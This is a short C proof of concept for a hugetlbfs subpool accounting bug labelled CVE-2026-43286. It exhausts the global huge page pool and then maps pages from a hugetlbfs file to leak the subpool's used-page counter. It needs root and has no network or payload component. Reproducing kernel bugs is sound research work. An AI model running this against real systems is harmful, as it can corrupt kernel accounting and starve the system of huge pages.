/*
* PoC for CVE-2026-43286
* Conceptual reproduction to trigger subpool leak.
* Requires root privileges to mount hugetlbfs and allocate pages.
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#define HUGETLB_SIZE (2 * 1024 * 1024) // 2MB huge page
void consume_global_pages(int count) {
// Allocate pages globally to exhaust the pool
for (int i = 0; i < count; i++) {
void *addr = mmap(NULL, HUGETLB_SIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB, -1, 0);
if (addr == MAP_FAILED) {
perror("mmap global failed");
return;
}
// Keep the mapping to hold the page
}
printf("Consumed %d global pages.\n", count);
}
int main() {
// Step 1: Setup environment (conceptual, usually done via shell)
// mount -t hugetlbfs none /mnt/huge -o min_size=2M,max_size=4M
// Step 2: Consume global pages to create a scenario where global allocation fails
// Assuming we have limited global pool, e.g., 4 pages total, subpool min=2, max=4
// We consume 2 pages globally, leaving 2 for the system/subpool interactions.
consume_global_pages(2);
// Step 3: Trigger the vulnerable path
// Open a file on the hugetlbfs mount (subpool)
int fd = open("/mnt/huge/test_file", O_CREAT | O_RDWR, 0755);
if (fd < 0) {
perror("open");
return 1;
}
// Step 4: Request 3 pages from the subpool.
// Subpool min=2, max=4. Used=0.
// Request asks for 3. Subpool provides 2, asks Global for 1.
// If Global is exhausted (consumed in step 2), global allocation fails.
// Vulnerability: spool->used_hpages increases by 3, but only decreases by 2 on failure.
// Leak of 1 page in used_hpages counter.
void *addr = mmap(NULL, 3 * HUGETLB_SIZE, PROT_READ | PROT_WRITE,
MAP_SHARED, fd, 0);
if (addr == MAP_FAILED) {
printf("Allocation failed as expected (Global pool exhausted).\n");
printf("Subpool used_hpages counter is now leaked (corrupted).\n");
} else {
printf("Allocation succeeded, vulnerability might not be triggered or pool is larger.\n");
munmap(addr, 3 * HUGETLB_SIZE);
}
close(fd);
return 0;
}